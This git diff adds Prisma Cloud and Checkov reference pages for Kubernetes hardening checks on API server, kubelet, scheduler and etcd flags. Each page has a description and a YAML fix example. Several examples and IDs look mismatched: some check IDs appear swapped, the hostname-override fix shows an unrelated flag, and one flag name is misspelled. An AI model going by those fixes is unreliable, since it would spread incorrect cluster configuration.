+|=== +|Prisma Cloud Policy ID +| 8b949f5d-4e7d-4f79-98f0-d9d633f67881 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py[CKV_K8S_77] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Turn on Role Based Access Control. +Role Based Access Control (RBAC) allows fine-grained control over the operations that different entities can perform on different objects in the cluster. +It is recommended to use the RBAC authorization mode. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --authorization-mode=RBAC,Node + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow-1.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow-1.adoc new file mode 100644 index 000000000..7f671b751 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow-1.adoc @@ -0,0 +1,65 @@ +== The --authorization-mode argument set to 'AlwaysAllow' for Kubelet +//' --authorization-mode' argument set to AlwaysAllow for Kubelet + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b7c20b54-5888-4f2a-8b25-7c918f6beb78 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py[CKV_K8S_74] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not always authorize all requests. +The API Server, can be configured to allow all requests. +This mode should not be used on any production cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --authorization-mode=RBAC,node + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow.adoc new file mode 100644 index 000000000..568b78c4e --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow.adoc @@ -0,0 +1,67 @@ +== The --authorization-mode argument is set to AlwaysAllow for API server +// '--authorization-mode' argument set to 'AlwaysAllow' for API server + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7e6128ec-aab4-4985-8212-a76202f2a3f0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py[CKV_K8S_139] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not allow all requests. +Enable explicit authorization. +Kubelets, by default, allow all authenticated requests (even anonymous ones) without needing explicit authorization checks from the apiserver. +You should restrict this behavior and only allow explicitly authorized requests. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --authorization-mode=RBAC,node + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-auto-tls-argument-is-not-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-auto-tls-argument-is-not-set-to-true.adoc new file mode 100644 index 000000000..ff5ddea92 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-auto-tls-argument-is-not-set-to-true.adoc @@ -0,0 +1,68 @@ +== The --auto-tls argument is set to True +// '--auto-tls' argument set to True + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 253fcd41-e93f-479e-9176-2d8062e9e0d8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py[CKV_K8S_118] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not use self-signed certificates for TLS. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should not be available to unauthenticated clients. +You should enable the client authentication via valid certificates to secure the access to the etcd service. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + annotations: + scheduler.alpha.kubernetes.io/critical-pod: "" + creationTimestamp: null + labels: + component: etcd + tier: control-plane + name: etcd + namespace: kube-system +spec: + containers: + - command: ++ - etcd ++ - --auto-tls=true + image: k8s.gcr.io/etcd-amd64:3.2.18", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-basic-auth-file-argument-is-not-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-basic-auth-file-argument-is-not-set.adoc new file mode 100644 index 000000000..1ef9a44aa --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-basic-auth-file-argument-is-not-set.adoc @@ -0,0 +1,97 @@ +== The --basic-auth-file argument is Set +// '--basic-auth-file' argument is set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5baa14e0-7150-46fe-af54-6679b4d1b4db + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py[CKV_K8S_69] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not use basic authentication. +Basic authentication uses plaintext credentials for authentication. +Currently, the basic authentication credentials last indefinitely, and the password cannot be changed without restarting the API server. +The basic authentication is currently supported for convenience. +Hence, basic authentication should not be used. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: + - kube-apiserver + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001-1.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001-1.adoc new file mode 100644 index 000000000..73f5df4ab --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001-1.adoc @@ -0,0 +1,65 @@ +== The --bind-address argument is not set to 127.0.0.1 +// '--bind-address' argument not set to 127.0.0.1. + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2484b8cc-2549-4ef3-ad63-3188d6a2013b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py[CKV_K8S_115] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not bind the scheduler service to non-loopback insecure addresses. +The Scheduler API service which runs on port 10251/TCP by default is used for health and metrics information and is available without authentication or encryption. +As such it should only be bound to a localhost interface, to minimize the cluster's attack surface. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "piVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-scheduler ++ - --bind-address=127.0.0.1 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001.adoc new file mode 100644 index 000000000..f5d866637 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001.adoc @@ -0,0 +1,64 @@ +== The --bind-address argument for controller managers is not set to 127.0.0.1 +// '--bind-address' argument for controller managers not set to 127.0.0.1 + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9fa4bd4d-c778-4205-a842-6f75a515ab1c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py[CKV_K8S_113] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not bind the Controller Manager service to non-loopback insecure addresses. +The Controller Manager API service which runs on port 10252/TCP by default is used for health and metrics information and is available without authentication or encryption. +As such it should only be bound to a localhost interface, to minimize the cluster's attack surface + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system + spec: + containers: + - command: + - kube-controller-manager ++ - --bind-address=127.0.0.1 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-cert-file-and-key-file-arguments-are-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-cert-file-and-key-file-arguments-are-set-as-appropriate.adoc new file mode 100644 index 000000000..8eef8b4f8 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-cert-file-and-key-file-arguments-are-set-as-appropriate.adoc @@ -0,0 +1,66 @@ +== The --cert-file and --key-file arguments are not set appropriately +// '--cert-file' and '--key-file' arguments not set appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 88b22903-9439-48f6-86ad-7f1165d0d70a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py[CKV_K8S_116] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Configure TLS encryption for the etcd service. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should be encrypted in transit. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --etcd-certfile=/path/to/cert ++ - --etcd-keyfile=/path/to/key + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-ca-file-argument-is-set-as-appropriate-scored.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-ca-file-argument-is-set-as-appropriate-scored.adoc new file mode 100644 index 000000000..71fefd252 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-ca-file-argument-is-set-as-appropriate-scored.adoc @@ -0,0 +1,67 @@ +== The --client-ca-file argument for API Servers is not set appropriately +// '--client-ca-file' argument for API Servers not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5afba38b-5dba-4292-80f2-fa901f7b2f6d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py[CKV_K8S_140] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Enable Kubelet authentication using certificates. +The connections from the apiserver to the kubelet are used for fetching logs for pods, attaching (through kubectl) to running pods, and using the kubelet's port-forwarding functionality. +These connections terminate at the kubelet's HTTPS endpoint. +By default, the apiserver does not verify the kubelet's serving certificate, which makes the connection subject to man-in-the-middle attacks, and unsafe to run over untrusted and/or public networks. +Enabling Kubelet certificate authentication ensures that the apiserver could authenticate the Kubelet before submitting any requests. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --root-ca-file=test.pem + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-cert-auth-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-cert-auth-argument-is-set-to-true.adoc new file mode 100644 index 000000000..28b7b1a0f --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-cert-auth-argument-is-set-to-true.adoc @@ -0,0 +1,67 @@ +== The --client-cert-auth argument is not set to True +// '--client-cert-auth' argument not set to True + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9bab9853-71b2-4332-83e0-f191a1775af4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py[CKV_K8S_117] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Enable client authentication on etcd service. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should not be available to unauthenticated clients. +You should enable the client authentication via valid certificates to secure the access to the etcd service. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + annotations: + scheduler.alpha.kubernetes.io/critical-pod: "" + creationTimestamp: null + labels: + component: etcd + tier: control-plane + name: etcd + namespace: kube-system +spec: + containers: + - command: ++ - etcd ++ - --client-cert-auth=true + image: k8s.gcr.io/etcd-amd64:3.2.18", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate-1.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate-1.adoc new file mode 100644 index 000000000..e5e86a81a --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate-1.adoc @@ -0,0 +1,98 @@ +== The --etcd-cafile argument is not set appropriately +// '--etcd-cafile' argument not set appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 48ec1bd2-6f41-4289-8d51-7d7937633644 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py[CKV_K8S_102] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +*etcd* should be configured to make use of TLS encryption for client connections. +*etcd* is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should be protected by client authentication. +This requires the API server to identify itself to the **etcd **server using a SSL Certificate Authority file. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --etcd-ca-file=ca.file + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..aa1632f0f --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate.adoc @@ -0,0 +1,126 @@ +== Encryption providers are not appropriately configured +// Encryption providers not set appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b52de5ab-ae4e-461f-a94d-5980a59078bf + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py[CKV_K8S_104] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + +//// +Bridgecrew +Prisma Cloud +* Encryption providers are not appropriately configured* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b52de5ab-ae4e-461f-a94d-5980a59078bf + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py [CKV_K8S_104] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== +//// + + +=== Description + + +Where etcd encryption is used, appropriate providers should be configured. +Where etcd encryption is used, it is important to ensure that the appropriate set of encryption providers is used. +Currently, the aescbc, kms and secretbox are likely to be appropriate options. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,go] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --encryption-provider-config=config.file + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver-should-pass + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki ", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-certfile-and-etcd-keyfile-arguments-are-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-certfile-and-etcd-keyfile-arguments-are-set-as-appropriate.adoc new file mode 100644 index 000000000..7221d66ec --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-certfile-and-etcd-keyfile-arguments-are-set-as-appropriate.adoc @@ -0,0 +1,98 @@ +== The --etcd-certfile and --etcd-keyfile arguments are not set appropriately +// '--etcd-certfile' and '--etcd-keyfile' arguments not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2c41d0d8-f2fa-43a9-80a7-fe5623a728d3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py[CKV_K8S_99] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +etcd should be configured to make use of TLS encryption for client connections. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should be protected by client authentication. +This requires the API server to identify itself to the etcd server using a client certificate and key. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: + - kube-apiserver + - --etcd-certfile=/path/to/cert + - --etcd-keyfile=/path/to/key + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver-should-pass + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki ", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-event-qps-argument-is-set-to-0-or-a-level-which-ensures-appropriate-event-capture.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-event-qps-argument-is-set-to-0-or-a-level-which-ensures-appropriate-event-capture.adoc new file mode 100644 index 000000000..a10b09035 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-event-qps-argument-is-set-to-0-or-a-level-which-ensures-appropriate-event-capture.adoc @@ -0,0 +1,67 @@ +== The --event-qps argument is not set to a level that ensures appropriate event capture +// '--event-qps' argument not set to a level that ensures appropriate event capture + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8b6e2702-e548-4c22-a41c-0e29662635af + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py[CKV_K8S_147] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Security relevant information should be captured. +The --event-qps flag on the Kubelet can be used to limit the rate at which events are gathered. +Setting this too low could result in relevant events not being logged, however the unlimited setting of 0 could result in a denial of service on the kubelet. +It is important to capture all events and not restrict event creation. +Events are an important source of security information and analytics that ensure that your environment is consistently monitored using the event data. + +=== Fix - Buildtime + + +*Kubernetes *Kind* Pod* + + + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --event-qps=2 + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-hostname-override-argument-is-not-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-hostname-override-argument-is-not-set.adoc new file mode 100644 index 000000000..4f5677e46 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-hostname-override-argument-is-not-set.adoc @@ -0,0 +1,98 @@ +== The --hostname-override argument is set +// '--hostname-override' argument is set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 882e2ea6-5b70-4ae4-9ddb-112f4dc3f873 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py[CKV_K8S_146] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not override node hostnames. +Overriding hostnames could potentially break TLS setup between the kubelet and the apiserver. +Additionally, with overridden hostnames, it becomes increasingly difficult to associate logs with a particular node and process them for security analytics. +Hence, you should setup your kubelet nodes with resolvable FQDNs and avoid overriding the hostnames with IPs. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: + - kubelet + - --read-only-port=80 + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kubelet + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-bind-address-argument-is-not-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-bind-address-argument-is-not-set.adoc new file mode 100644 index 000000000..26b5358d3 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-bind-address-argument-is-not-set.adoc @@ -0,0 +1,65 @@ +== The --insecure-bind-address argument is set +// '--insecure-bind-address' argument is set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ff60f8b9-d509-4765-98ef-44ceb1a85f5e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py[CKV_K8S_86] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not bind the insecure API service. +If you bind the apiserver to an insecure address, basically anyone who could connect to it over the insecure port, would have unauthenticated and unencrypted access to your master node. +The apiserver doesn't do any authentication checking for insecure binds and traffic to the Insecure API port is not encrpyted, allowing attackers to potentially read sensitive data in transit. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --bind-address=192.168.1.1 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-port-argument-is-set-to-0.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-port-argument-is-set-to-0.adoc new file mode 100644 index 000000000..5889a95bb --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-port-argument-is-set-to-0.adoc @@ -0,0 +1,65 @@ +== The --insecure-port argument is not set to 0 +// '--insecure-port' argument not set to 0 + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2536bc15-b47e-4ec7-a215-1193012cb39c + +|Checkov Check ID +| 